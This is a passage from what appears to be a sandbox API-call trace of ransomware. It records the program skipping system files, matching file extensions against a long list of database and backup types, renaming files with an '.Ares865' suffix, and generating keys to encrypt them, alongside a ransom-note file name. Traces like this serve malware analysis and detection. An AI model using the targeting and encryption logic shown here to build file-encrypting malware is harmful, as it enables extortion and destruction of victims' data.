lpString2="db-wal") returned 1 [0089.691] lstrlenW (lpString="dbc") returned 3 [0089.691] lstrcmpiW (lpString1="H1D", lpString2="dbc") returned 1 [0089.691] lstrlenW (lpString="dbs") returned 3 [0089.691] lstrcmpiW (lpString1="H1D", lpString2="dbs") returned 1 [0089.691] lstrlenW (lpString="dbt") returned 3 [0089.691] lstrcmpiW (lpString1="H1D", lpString2="dbt") returned 1 [0089.691] lstrlenW (lpString="dbv") returned 3 [0089.691] lstrcmpiW (lpString1="H1D", lpString2="dbv") returned 1 [0089.691] lstrlenW (lpString="dbx") returned 3 [0089.691] lstrcmpiW (lpString1="H1D", lpString2="dbx") returned 1 [0089.691] lstrlenW (lpString="dcb") returned 3 [0089.691] lstrcmpiW (lpString1="H1D", lpString2="dcb") returned 1 [0089.691] lstrlenW (lpString="dct") returned 3 [0089.691] lstrcmpiW (lpString1="H1D", lpString2="dct") returned 1 [0089.691] lstrlenW (lpString="dcx") returned 3 [0089.691] lstrcmpiW (lpString1="H1D", lpString2="dcx") returned 1 [0089.691] lstrlenW (lpString="ddl") returned 3 [0089.691] lstrcmpiW (lpString1="H1D", lpString2="ddl") returned 1 [0089.691] lstrlenW (lpString="dlis") returned 4 [0089.691] lstrcmpiW (lpString1=".H1D", lpString2="dlis") returned -1 [0089.691] lstrlenW (lpString="dp1") returned 3 [0089.691] lstrcmpiW (lpString1="H1D", lpString2="dp1") returned 1 [0089.691] lstrlenW (lpString="dqy") returned 3 [0089.691] lstrcmpiW (lpString1="H1D", lpString2="dqy") returned 1 [0089.691] lstrlenW (lpString="dsk") returned 3 [0089.691] lstrcmpiW (lpString1="H1D", lpString2="dsk") returned 1 [0089.691] lstrlenW (lpString="dsn") returned 3 [0089.692] lstrcmpiW (lpString1="H1D", lpString2="dsn") returned 1 [0089.692] lstrlenW (lpString="dtsx") returned 4 [0089.692] lstrcmpiW (lpString1=".H1D", lpString2="dtsx") returned -1 [0089.692] lstrlenW (lpString="dxl") returned 3 [0089.692] lstrcmpiW (lpString1="H1D", lpString2="dxl") returned 1 [0089.692] lstrlenW (lpString="eco") returned 3 [0089.692] lstrcmpiW (lpString1="H1D", lpString2="eco") returned 1 [0089.692] lstrlenW (lpString="ecx") returned 3 [0089.692] lstrcmpiW (lpString1="H1D", lpString2="ecx") returned 1 [0089.692] lstrlenW (lpString="edb") returned 3 [0089.692] lstrcmpiW (lpString1="H1D", lpString2="edb") returned 1 [0089.692] lstrlenW (lpString="epim") returned 4 [0089.692] lstrcmpiW (lpString1=".H1D", lpString2="epim") returned -1 [0089.692] lstrlenW (lpString="fcd") returned 3 [0089.692] lstrcmpiW (lpString1="H1D", lpString2="fcd") returned 1 [0089.692] lstrlenW (lpString="fdb") returned 3 [0089.692] lstrcmpiW (lpString1="H1D", lpString2="fdb") returned 1 [0089.692] lstrlenW (lpString="fic") returned 3 [0089.692] lstrcmpiW (lpString1="H1D", lpString2="fic") returned 1 [0089.692] lstrlenW (lpString="flexolibrary") returned 12 [0089.692] lstrcmpiW (lpString1="alidator.H1D", lpString2="flexolibrary") returned -1 [0089.692] lstrlenW (lpString="fm5") returned 3 [0089.692] lstrcmpiW (lpString1="H1D", lpString2="fm5") returned 1 [0089.692] lstrlenW (lpString="fmp") returned 3 [0089.692] lstrcmpiW (lpString1="H1D", lpString2="fmp") returned 1 [0089.692] lstrlenW (lpString="fmp12") returned 5 [0089.692] lstrcmpiW (lpString1="r.H1D", lpString2="fmp12") returned 1 [0089.692] lstrlenW (lpString="fmpsl") returned 5 [0089.692] lstrcmpiW (lpString1="r.H1D", lpString2="fmpsl") returned 1 [0089.692] lstrlenW (lpString="fol") returned 3 [0089.692] lstrcmpiW (lpString1="H1D", lpString2="fol") returned 1 [0089.692] lstrlenW (lpString="fp3") returned 3 [0089.692] lstrcmpiW (lpString1="H1D", lpString2="fp3") returned 1 [0089.692] lstrlenW (lpString="fp4") returned 3 [0089.692] lstrcmpiW (lpString1="H1D", lpString2="fp4") returned 1 [0089.692] lstrlenW (lpString="fp5") returned 3 [0089.692] lstrcmpiW (lpString1="H1D", lpString2="fp5") returned 1 [0089.692] lstrlenW (lpString="fp7") returned 3 [0089.692] lstrcmpiW (lpString1="H1D", lpString2="fp7") returned 1 [0089.693] lstrlenW (lpString="fpt") returned 3 [0089.693] lstrcmpiW (lpString1="H1D", lpString2="fpt") returned 1 [0089.693] lstrlenW (lpString="frm") returned 3 [0089.693] lstrcmpiW (lpString1="H1D", lpString2="frm") returned 1 [0089.693] lstrlenW (lpString="gdb") returned 3 [0089.693] lstrcmpiW (lpString1="H1D", lpString2="gdb") returned 1 [0089.693] lstrlenW (lpString="gdb") returned 3 [0089.693] lstrcmpiW (lpString1="H1D", lpString2="gdb") returned 1 [0089.693] lstrlenW (lpString="grdb") returned 4 [0089.693] lstrcmpiW (lpString1=".H1D", lpString2="grdb") returned -1 [0089.693] lstrlenW (lpString="gwi") returned 3 [0089.693] lstrcmpiW (lpString1="H1D", lpString2="gwi") returned 1 [0089.693] lstrlenW (lpString="hdb") returned 3 [0089.693] lstrcmpiW (lpString1="H1D", lpString2="hdb") returned -1 [0089.693] lstrlenW (lpString="his") returned 3 [0089.693] lstrcmpiW (lpString1="H1D", lpString2="his") returned -1 [0089.693] lstrlenW (lpString="ib") returned 2 [0089.693] lstrcmpiW (lpString1="1D", lpString2="ib") returned -1 [0089.693] lstrlenW (lpString="idb") returned 3 [0089.693] lstrcmpiW (lpString1="H1D", lpString2="idb") returned -1 [0089.693] lstrlenW (lpString="ihx") returned 3 [0089.693] lstrcmpiW (lpString1="H1D", lpString2="ihx") returned -1 [0089.693] lstrlenW (lpString="itdb") returned 4 [0089.693] lstrcmpiW (lpString1=".H1D", lpString2="itdb") returned -1 [0089.693] lstrlenW (lpString="itw") returned 3 [0089.693] lstrcmpiW (lpString1="H1D", lpString2="itw") returned -1 [0089.693] lstrlenW (lpString="jet") returned 3 [0089.693] lstrcmpiW (lpString1="H1D", lpString2="jet") returned -1 [0089.693] lstrlenW (lpString="jtx") returned 3 [0089.693] lstrcmpiW (lpString1="H1D", lpString2="jtx") returned -1 [0089.693] lstrlenW (lpString="kdb") returned 3 [0089.693] lstrcmpiW (lpString1="H1D", lpString2="kdb") returned -1 [0089.693] lstrlenW (lpString="kexi") returned 4 [0089.693] lstrcmpiW (lpString1=".H1D", lpString2="kexi") returned -1 [0089.693] lstrlenW (lpString="kexic") returned 5 [0089.693] lstrcmpiW (lpString1="r.H1D", lpString2="kexic") returned 1 [0089.693] lstrlenW (lpString="kexis") returned 5 [0089.693] lstrcmpiW (lpString1="r.H1D", lpString2="kexis") returned 1 [0089.693] lstrlenW (lpString="lgc") returned 3 [0089.694] lstrcmpiW (lpString1="H1D", lpString2="lgc") returned -1 [0089.694] lstrlenW (lpString="lwx") returned 3 [0089.694] lstrcmpiW (lpString1="H1D", lpString2="lwx") returned -1 [0089.694] lstrlenW (lpString="maf") returned 3 [0089.694] lstrcmpiW (lpString1="H1D", lpString2="maf") returned -1 [0089.694] lstrlenW (lpString="maq") returned 3 [0089.694] lstrcmpiW (lpString1="H1D", lpString2="maq") returned -1 [0089.694] lstrlenW (lpString="mar") returned 3 [0089.694] lstrcmpiW (lpString1="H1D", lpString2="mar") returned -1 [0089.694] lstrlenW (lpString="marshal") returned 7 [0089.694] lstrcmpiW (lpString1="tor.H1D", lpString2="marshal") returned 1 [0089.694] lstrlenW (lpString="mas") returned 3 [0089.694] lstrcmpiW (lpString1="H1D", lpString2="mas") returned -1 [0089.694] lstrlenW (lpString="mav") returned 3 [0089.694] lstrcmpiW (lpString1="H1D", lpString2="mav") returned -1 [0089.694] lstrlenW (lpString="maw") returned 3 [0089.694] lstrcmpiW (lpString1="H1D", lpString2="maw") returned -1 [0089.694] lstrlenW (lpString="mdbhtml") returned 7 [0089.694] lstrcmpiW (lpString1="tor.H1D", lpString2="mdbhtml") returned 1 [0089.694] lstrlenW (lpString="mdn") returned 3 [0089.694] lstrcmpiW (lpString1="H1D", lpString2="mdn") returned -1 [0089.694] lstrlenW (lpString="mdt") returned 3 [0089.694] lstrcmpiW (lpString1="H1D", lpString2="mdt") returned -1 [0089.694] lstrlenW (lpString="mfd") returned 3 [0089.694] lstrcmpiW (lpString1="H1D", lpString2="mfd") returned -1 [0089.694] lstrlenW (lpString="mpd") returned 3 [0089.694] lstrcmpiW (lpString1="H1D", lpString2="mpd") returned -1 [0089.694] lstrlenW (lpString="mrg") returned 3 [0089.694] lstrcmpiW (lpString1="H1D", lpString2="mrg") returned -1 [0089.694] lstrlenW (lpString="mud") returned 3 [0089.694] lstrcmpiW (lpString1="H1D", lpString2="mud") returned -1 [0089.694] lstrlenW (lpString="mwb") returned 3 [0089.694] lstrcmpiW (lpString1="H1D", lpString2="mwb") returned -1 [0089.694] lstrlenW (lpString="myd") returned 3 [0089.694] lstrcmpiW (lpString1="H1D", lpString2="myd") returned -1 [0089.695] lstrlenW (lpString="ndf") returned 3 [0089.695] lstrcmpiW (lpString1="H1D", lpString2="ndf") returned -1 [0089.695] lstrlenW (lpString="nnt") returned 3 [0089.695] lstrcmpiW (lpString1="H1D", lpString2="nnt") returned -1 [0089.695] lstrlenW (lpString="nrmlib") returned 6 [0089.695] lstrcmpiW (lpString1="or.H1D", lpString2="nrmlib") returned 1 [0089.695] lstrlenW (lpString="ns2") returned 3 [0089.695] lstrcmpiW (lpString1="H1D", lpString2="ns2") returned -1 [0089.695] lstrlenW (lpString="ns3") returned 3 [0089.695] lstrcmpiW (lpString1="H1D", lpString2="ns3") returned -1 [0089.695] lstrlenW (lpString="ns4") returned 3 [0089.695] lstrcmpiW (lpString1="H1D", lpString2="ns4") returned -1 [0089.695] lstrlenW (lpString="nsf") returned 3 [0089.695] lstrcmpiW (lpString1="H1D", lpString2="nsf") returned -1 [0089.695] lstrlenW (lpString="nv") returned 2 [0089.695] lstrcmpiW (lpString1="1D", lpString2="nv") returned -1 [0089.695] lstrlenW (lpString="nv2") returned 3 [0089.695] lstrcmpiW (lpString1="H1D", lpString2="nv2") returned -1 [0089.695] lstrlenW (lpString="nwdb") returned 4 [0089.695] lstrcmpiW (lpString1=".H1D", lpString2="nwdb") returned -1 [0089.695] lstrlenW (lpString="nyf") returned 3 [0089.695] lstrcmpiW (lpString1="H1D", lpString2="nyf") returned -1 [0089.695] lstrlenW (lpString="odb") returned 3 [0089.695] lstrcmpiW (lpString1="H1D", lpString2="odb") returned -1 [0089.695] lstrlenW (lpString="odb") returned 3 [0089.695] lstrcmpiW (lpString1="H1D", lpString2="odb") returned -1 [0089.695] lstrlenW (lpString="oqy") returned 3 [0089.695] lstrcmpiW (lpString1="H1D", lpString2="oqy") returned -1 [0089.695] lstrlenW (lpString="ora") returned 3 [0089.695] lstrcmpiW (lpString1="H1D", lpString2="ora") returned -1 [0089.695] lstrlenW (lpString="orx") returned 3 [0089.695] lstrcmpiW (lpString1="H1D", lpString2="orx") returned -1 [0089.695] lstrlenW (lpString="owc") returned 3 [0089.695] lstrcmpiW (lpString1="H1D", lpString2="owc") returned -1 [0089.695] lstrlenW (lpString="p96") returned 3 [0089.695] lstrcmpiW (lpString1="H1D", lpString2="p96") returned -1 [0089.695] lstrlenW (lpString="p97") returned 3 [0089.695] lstrcmpiW (lpString1="H1D", lpString2="p97") returned -1 [0089.695] lstrlenW (lpString="pan") returned 3 [0089.695] lstrcmpiW (lpString1="H1D", lpString2="pan") returned -1 [0089.696] lstrlenW (lpString="pdb") returned 3 [0089.696] lstrcmpiW (lpString1="H1D", lpString2="pdb") returned -1 [0089.696] lstrlenW (lpString="pdm") returned 3 [0089.696] lstrcmpiW (lpString1="H1D", lpString2="pdm") returned -1 [0089.696] lstrlenW (lpString="pnz") returned 3 [0089.696] lstrcmpiW (lpString1="H1D", lpString2="pnz") returned -1 [0089.696] lstrlenW (lpString="qry") returned 3 [0089.696] lstrcmpiW (lpString1="H1D", lpString2="qry") returned -1 [0089.696] lstrlenW (lpString="qvd") returned 3 [0089.696] lstrcmpiW (lpString1="H1D", lpString2="qvd") returned -1 [0089.696] lstrlenW (lpString="rbf") returned 3 [0089.696] lstrcmpiW (lpString1="H1D", lpString2="rbf") returned -1 [0089.696] lstrlenW (lpString="rctd") returned 4 [0089.696] lstrcmpiW (lpString1=".H1D", lpString2="rctd") returned -1 [0089.696] lstrlenW (lpString="rod") returned 3 [0089.696] lstrcmpiW (lpString1="H1D", lpString2="rod") returned -1 [0089.696] lstrlenW (lpString="rodx") returned 4 [0089.696] lstrcmpiW (lpString1=".H1D", lpString2="rodx") returned -1 [0089.696] lstrlenW (lpString="rpd") returned 3 [0089.696] lstrcmpiW (lpString1="H1D", lpString2="rpd") returned -1 [0089.696] lstrlenW (lpString="rsd") returned 3 [0089.696] lstrcmpiW (lpString1="H1D", lpString2="rsd") returned -1 [0089.696] lstrlenW (lpString="sas7bdat") returned 8 [0089.696] lstrcmpiW (lpString1="ator.H1D", lpString2="sas7bdat") returned -1 [0089.696] lstrlenW (lpString="sbf") returned 3 [0089.696] lstrcmpiW (lpString1="H1D", lpString2="sbf") returned -1 [0089.696] lstrlenW (lpString="scx") returned 3 [0089.696] lstrcmpiW (lpString1="H1D", lpString2="scx") returned -1 [0089.696] lstrlenW (lpString="sdb") returned 3 [0089.696] lstrcmpiW (lpString1="H1D", lpString2="sdb") returned -1 [0089.696] lstrlenW (lpString="sdc") returned 3 [0089.696] lstrcmpiW (lpString1="H1D", lpString2="sdc") returned -1 [0089.696] lstrlenW (lpString="sdf") returned 3 [0089.696] lstrcmpiW (lpString1="H1D", lpString2="sdf") returned -1 [0089.696] lstrlenW (lpString="sis") returned 3 [0089.696] lstrcmpiW (lpString1="H1D", lpString2="sis") returned -1 [0089.696] lstrlenW (lpString="spq") returned 3 [0089.696] lstrcmpiW (lpString1="H1D", lpString2="spq") returned -1 [0089.696] lstrlenW (lpString="te") returned 2 [0089.697] lstrcmpiW (lpString1="1D", lpString2="te") returned -1 [0089.697] lstrlenW (lpString="teacher") returned 7 [0089.697] lstrcmpiW (lpString1="tor.H1D", lpString2="teacher") returned 1 [0089.697] lstrlenW (lpString="tmd") returned 3 [0089.697] lstrcmpiW (lpString1="H1D", lpString2="tmd") returned -1 [0089.697] lstrlenW (lpString="tps") returned 3 [0089.697] lstrcmpiW (lpString1="H1D", lpString2="tps") returned -1 [0089.697] lstrlenW (lpString="trc") returned 3 [0089.697] lstrcmpiW (lpString1="H1D", lpString2="trc") returned -1 [0089.697] lstrlenW (lpString="trc") returned 3 [0089.697] lstrcmpiW (lpString1="H1D", lpString2="trc") returned -1 [0089.697] lstrlenW (lpString="trm") returned 3 [0089.697] lstrcmpiW (lpString1="H1D", lpString2="trm") returned -1 [0089.697] lstrlenW (lpString="udb") returned 3 [0089.697] lstrcmpiW (lpString1="H1D", lpString2="udb") returned -1 [0089.697] lstrlenW (lpString="udl") returned 3 [0089.697] lstrcmpiW (lpString1="H1D", lpString2="udl") returned -1 [0089.697] lstrlenW (lpString="usr") returned 3 [0089.697] lstrcmpiW (lpString1="H1D", lpString2="usr") returned -1 [0089.697] lstrlenW (lpString="v12") returned 3 [0089.697] lstrcmpiW (lpString1="H1D", lpString2="v12") returned -1 [0089.697] lstrlenW (lpString="vis") returned 3 [0089.697] lstrcmpiW (lpString1="H1D", lpString2="vis") returned -1 [0089.697] lstrlenW (lpString="vpd") returned 3 [0089.697] lstrcmpiW (lpString1="H1D", lpString2="vpd") returned -1 [0089.697] lstrlenW (lpString="vvv") returned 3 [0089.697] lstrcmpiW (lpString1="H1D", lpString2="vvv") returned -1 [0089.697] lstrlenW (lpString="wdb") returned 3 [0089.697] lstrcmpiW (lpString1="H1D", lpString2="wdb") returned -1 [0089.697] lstrlenW (lpString="wmdb") returned 4 [0089.697] lstrcmpiW (lpString1=".H1D", lpString2="wmdb") returned -1 [0089.697] lstrlenW (lpString="wrk") returned 3 [0089.697] lstrcmpiW (lpString1="H1D", lpString2="wrk") returned -1 [0089.697] lstrlenW (lpString="xdb") returned 3 [0089.697] lstrcmpiW (lpString1="H1D", lpString2="xdb") returned -1 [0089.697] lstrlenW (lpString="xld") returned 3 [0089.697] lstrcmpiW (lpString1="H1D", lpString2="xld") returned -1 [0089.697] lstrlenW (lpString="xmlff") returned 5 [0089.697] lstrcmpiW (lpString1="r.H1D", lpString2="xmlff") returned -1 [0089.698] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D.Ares865") returned 84 [0089.698] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_cvalidator.h1d"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D.Ares865" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_cvalidator.h1d.ares865"), dwFlags=0x1) returned 1 [0089.699] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D.Ares865" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_cvalidator.h1d.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0089.699] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12066) returned 1 [0089.699] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0089.699] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0089.699] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0089.699] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0089.700] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0089.700] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.700] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3230, lpName=0x0) returned 0x15c [0089.702] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3230) returned 0x190000 [0089.703] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.704] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.704] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.704] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.704] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.704] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.704] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.704] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.704] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.704] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0089.704] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.704] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0089.704] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.704] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0089.705] CloseHandle (hObject=0x15c) returned 1 [0089.705] CloseHandle (hObject=0x118) returned 1 [0089.705] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.705] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.705] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.705] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x24534c56, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae2660aa, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae2660aa, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x365fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Help_MKWD_AssetId.H1W", cAlternateFileName="HELP_M~1.H1W")) returned 1 [0089.705] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.705] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2="aoldtz.exe") returned 1 [0089.705] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2=".") returned 1 [0089.705] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2="..") returned 1 [0089.705] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2="windows") returned -1 [0089.705] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2="bootmgr") returned 1 [0089.705] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2="temp") returned -1 [0089.705] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2="pagefile.sys") returned -1 [0089.705] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2="boot") returned 1 [0089.705] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2="ids.txt") returned -1 [0089.705] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2="ntuser.dat") returned -1 [0089.705] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2="perflogs") returned -1 [0089.705] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2="MSBuild") returned -1 [0089.705] lstrlenW (lpString="Help_MKWD_AssetId.H1W") returned 21 [0089.705] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D") returned 76 [0089.705] lstrcpyW (in: lpString1=0x2cce472, lpString2="Help_MKWD_AssetId.H1W" | out: lpString1="Help_MKWD_AssetId.H1W") returned="Help_MKWD_AssetId.H1W" [0089.705] lstrlenW (lpString="Help_MKWD_AssetId.H1W") returned 21 [0089.705] lstrlenW (lpString="Ares865") returned 7 [0089.705] lstrcmpiW (lpString1="tId.H1W", lpString2="Ares865") returned 1 [0089.706] lstrlenW (lpString=".dll") returned 4 [0089.706] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2=".dll") returned 1 [0089.706] lstrlenW (lpString=".lnk") returned 4 [0089.706] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2=".lnk") returned 1 [0089.706] lstrlenW (lpString=".ini") returned 4 [0089.706] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2=".ini") returned 1 [0089.706] lstrlenW (lpString=".sys") returned 4 [0089.706] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2=".sys") returned 1 [0089.706] lstrlenW (lpString="Help_MKWD_AssetId.H1W") returned 21 [0089.706] lstrlenW (lpString="bak") returned 3 [0089.706] lstrcmpiW (lpString1="H1W", lpString2="bak") returned 1 [0089.706] lstrlenW (lpString="ba_") returned 3 [0089.706] lstrcmpiW (lpString1="H1W", lpString2="ba_") returned 1 [0089.706] lstrlenW (lpString="dbb") returned 3 [0089.706] lstrcmpiW (lpString1="H1W", lpString2="dbb") returned 1 [0089.706] lstrlenW (lpString="vmdk") returned 4 [0089.706] lstrcmpiW (lpString1=".H1W", lpString2="vmdk") returned -1 [0089.706] lstrlenW (lpString="rar") returned 3 [0089.706] lstrcmpiW (lpString1="H1W", lpString2="rar") returned -1 [0089.706] lstrlenW (lpString="zip") returned 3 [0089.706] lstrcmpiW (lpString1="H1W", lpString2="zip") returned -1 [0089.706] lstrlenW (lpString="tgz") returned 3 [0089.706] lstrcmpiW (lpString1="H1W", lpString2="tgz") returned -1 [0089.706] lstrlenW (lpString="vbox") returned 4 [0089.706] lstrcmpiW (lpString1=".H1W", lpString2="vbox") returned -1 [0089.706] lstrlenW (lpString="vdi") returned 3 [0089.706] lstrcmpiW (lpString1="H1W", lpString2="vdi") returned -1 [0089.706] lstrlenW (lpString="vhd") returned 3 [0089.706] lstrcmpiW (lpString1="H1W", lpString2="vhd") returned -1 [0089.706] lstrlenW (lpString="vhdx") returned 4 [0089.706] lstrcmpiW (lpString1=".H1W", lpString2="vhdx") returned -1 [0089.706] lstrlenW (lpString="avhd") returned 4 [0089.706] lstrcmpiW (lpString1=".H1W", lpString2="avhd") returned -1 [0089.706] lstrlenW (lpString="db") returned 2 [0089.706] lstrcmpiW (lpString1="1W", lpString2="db") returned -1 [0089.706] lstrlenW (lpString="db2") returned 3 [0089.706] lstrcmpiW (lpString1="H1W", lpString2="db2") returned 1 [0089.706] lstrlenW (lpString="db3") returned 3 [0089.706] lstrcmpiW (lpString1="H1W", lpString2="db3") returned 1 [0089.707] lstrlenW (lpString="dbf") returned 3 [0089.707] lstrcmpiW (lpString1="H1W", lpString2="dbf") returned 1 [0089.707] lstrlenW (lpString="mdf") returned 3 [0089.707] lstrcmpiW (lpString1="H1W", lpString2="mdf") returned -1 [0089.707] lstrlenW (lpString="mdb") returned 3 [0089.707] lstrcmpiW (lpString1="H1W", lpString2="mdb") returned -1 [0089.707] lstrlenW (lpString="sql") returned 3 [0089.707] lstrcmpiW (lpString1="H1W", lpString2="sql") returned -1 [0089.707] lstrlenW (lpString="sqlite") returned 6 [0089.707] lstrcmpiW (lpString1="Id.H1W", lpString2="sqlite") returned -1 [0089.707] lstrlenW (lpString="sqlite3") returned 7 [0089.707] lstrcmpiW (lpString1="tId.H1W", lpString2="sqlite3") returned 1 [0089.707] lstrlenW (lpString="sqlitedb") returned 8 [0089.707] lstrcmpiW (lpString1="etId.H1W", lpString2="sqlitedb") returned -1 [0089.707] lstrlenW (lpString="xml") returned 3 [0089.707] lstrcmpiW (lpString1="H1W", lpString2="xml") returned -1 [0089.707] lstrlenW (lpString="$er") returned 3 [0089.707] lstrcmpiW (lpString1="H1W", lpString2="$er") returned 1 [0089.707] lstrlenW (lpString="4dd") returned 3 [0089.707] lstrcmpiW (lpString1="H1W", lpString2="4dd") returned 1 [0089.707] lstrlenW (lpString="4dl") returned 3 [0089.707] lstrcmpiW (lpString1="H1W", lpString2="4dl") returned 1 [0089.707] lstrlenW (lpString="^^^") returned 3 [0089.707] lstrcmpiW (lpString1="H1W", lpString2="^^^") returned 1 [0089.707] lstrlenW (lpString="abs") returned 3 [0089.707] lstrcmpiW (lpString1="H1W", lpString2="abs") returned 1 [0089.707] lstrlenW (lpString="abx") returned 3 [0089.707] lstrcmpiW (lpString1="H1W", lpString2="abx") returned 1 [0089.707] lstrlenW (lpString="accdb") returned 5 [0089.707] lstrcmpiW (lpString1="d.H1W", lpString2="accdb") returned 1 [0089.707] lstrlenW (lpString="accdc") returned 5 [0089.707] lstrcmpiW (lpString1="d.H1W", lpString2="accdc") returned 1 [0089.707] lstrlenW (lpString="accde") returned 5 [0089.707] lstrcmpiW (lpString1="d.H1W", lpString2="accde") returned 1 [0089.707] lstrlenW (lpString="accdr") returned 5 [0089.707] lstrcmpiW (lpString1="d.H1W", lpString2="accdr") returned 1 [0089.707] lstrlenW (lpString="accdt") returned 5 [0089.707] lstrcmpiW (lpString1="d.H1W", lpString2="accdt") returned 1 [0089.707] lstrlenW (lpString="accdw") returned 5 [0089.708] lstrcmpiW (lpString1="d.H1W", lpString2="accdw") returned 1 [0089.708] lstrlenW (lpString="accft") returned 5 [0089.708] lstrcmpiW (lpString1="d.H1W", lpString2="accft") returned 1 [0089.708] lstrlenW (lpString="adb") returned 3 [0089.708] lstrcmpiW (lpString1="H1W", lpString2="adb") returned 1 [0089.708] lstrlenW (lpString="adb") returned 3 [0089.708] lstrcmpiW (lpString1="H1W", lpString2="adb") returned 1 [0089.708] lstrlenW (lpString="ade") returned 3 [0089.708] lstrcmpiW (lpString1="H1W", lpString2="ade") returned 1 [0089.708] lstrlenW (lpString="adf") returned 3 [0089.708] lstrcmpiW (lpString1="H1W", lpString2="adf") returned 1 [0089.708] lstrlenW (lpString="adn") returned 3 [0089.708] lstrcmpiW (lpString1="H1W", lpString2="adn") returned 1 [0089.708] lstrlenW 